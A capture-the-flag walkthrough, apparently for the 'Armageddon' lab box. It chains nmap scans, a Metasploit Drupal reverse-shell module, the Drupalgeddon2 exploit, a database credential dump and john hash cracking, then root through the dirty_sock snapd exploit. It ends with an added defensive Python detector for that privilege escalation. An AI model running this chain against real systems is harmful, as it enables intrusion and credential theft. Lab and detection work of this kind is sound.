nmap -sC -sV -O -p- -oA armageddon 10.129.182.137

nmap -sU -O -p- -oA armageddon-udp 10.129.182.137

We browse to the website at http://10.129.182.137

It is a Drupal 7 site.

We start Metasploit and search for drupal:

msf6> search drupal

msf6> use 1

msf6> set LHOST tun0

msf6> set RHOST 10.129.182.137

msf6> run


https://github.com/pimps/CVE-2018-7600

python3 drupal7-CVE-2018-7600.py http://10.129.182.137/ -c 'cat sites/default/settings'

We obtain the credentials:

mysql -udrupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;'

We copy the hash into a file named armageddon_hash:

john armageddon_hash

We obtain the password.

ssh brucetherealadmin@10.129.182.137

https://github.com/initstring/dirty_sock/


sudo /usr/bin/snap install --devmode new.snap

su dirty_sock

sudo -i

We enter the password again:

dirty_sock
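
From the defender's side, the last steps leave a recognizable trail: a sudo-run `snap install --devmode` of a local file, followed by the appearance of the `dirty_sock` account. The following is an added example, not part of the original write-up, that correlates those two events; the log lines are constructed samples in the usual sudo and useradd syslog formats, and the function names and the 60-second window are assumptions.

```python
import re
from datetime import datetime

# Constructed sample lines in sudo / useradd syslog format (not captured from the box).
SAMPLE_LOG = """\
Jul 13 06:50:01 host sudo: brucetherealadmin : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/snap install --devmode new.snap
Jul 13 06:50:04 host useradd[2211]: new user: name=dirty_sock, UID=1001, GID=1001, home=/home/dirty_sock, shell=/bin/bash
Jul 13 07:10:00 host sudo: alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/snap install core
Jul 13 09:00:00 host useradd[3001]: new user: name=backup, UID=1002, GID=1002, home=/home/backup, shell=/bin/bash
"""

SUDO_RE = re.compile(r"sudo: +(?P<user>\S+) : .*COMMAND=(?P<cmd>.+)$")
USERADD_RE = re.compile(r"useradd\[\d+\]: new user: name=(?P<name>[^,]+),")
# Flags that let snapd install a local package without store signatures or confinement.
SIDELOAD_FLAGS = {"--devmode", "--dangerous"}

def ts(line):
    """Parse the classic syslog timestamp prefix (no year in this format)."""
    return datetime.strptime(line[:15], "%b %d %H:%M:%S")

def is_sideload(cmd):
    """True for `snap install` given a sideload flag or a local .snap file."""
    args = cmd.split()
    if len(args) < 3 or args[0].rsplit("/", 1)[-1] != "snap" or args[1] != "install":
        return False
    rest = args[2:]
    return bool(SIDELOAD_FLAGS & set(rest)) or any(a.endswith(".snap") for a in rest)

def find_alerts(log_text, window_s=60):
    """Return (sudo_user, command, accounts created within window_s seconds after)."""
    events = [(ts(l), l) for l in log_text.splitlines() if l.strip()]
    alerts = []
    for t0, line in events:
        m = SUDO_RE.search(line)
        if not m or not is_sideload(m.group("cmd")):
            continue
        created = [u.group("name") for t, l in events
                   if 0 <= (t - t0).total_seconds() <= window_s
                   and (u := USERADD_RE.search(l))]
        alerts.append((m.group("user"), m.group("cmd"), created))
    return alerts

if __name__ == "__main__":
    for user, cmd, created in find_alerts(SAMPLE_LOG):
        print(f"ALERT sudo by {user}: {cmd} -> new accounts: {created or 'none'}")
```

A sideloaded snap followed by account creation is the high-confidence case; a sideload alone is still worth reviewing wherever a sudoers rule permits `snap install`.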


copyright©2022 Cu3rv0x all rights reserved